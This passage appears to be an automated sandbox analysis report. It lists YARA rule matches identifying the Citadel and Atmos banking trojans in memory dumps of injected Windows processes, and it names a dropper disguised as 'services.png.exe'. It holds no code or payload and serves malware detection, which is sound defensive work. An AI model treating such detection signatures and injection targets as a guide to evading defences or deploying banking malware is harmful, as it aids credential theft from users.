                        Source: 26.0.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.3.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 31.2.XRdxSzSUL8yOL.exe.2e30000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.0.ApplicationFrameHost.exe.180000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.0.RuntimeBroker.exe.190000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.0.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 41.0.XRdxSzSUL8yOL.exe.2c90000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 17.3.RuntimeBroker.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.0.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.0.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.3.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.3.svchost.exe.910000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 37.2.XRdxSzSUL8yOL.exe.c90000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 14.0.RuntimeBroker.exe.ab0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.3.UserOOBEBroker.exe.10000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.3.conhost.exe.30000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 3.3.svchost.exe.910000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.3.services.png.exe.2590000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 28.3.RuntimeBroker.exe.810000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.0.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 35.0.XRdxSzSUL8yOL.exe.25d0000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 22.0.SystemSettings.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.0.TextInputHost.exe.580000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.3.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.3.services.png.exe.2590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.0.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 24.3.svchost.exe.fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 16.3.TextInputHost.exe.580000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 38.2.XRdxSzSUL8yOL.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 27.3.backgroundTaskHost.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 8.0.StartMenuExperienceHost.exe.b50000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0.3.services.png.exe.2590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
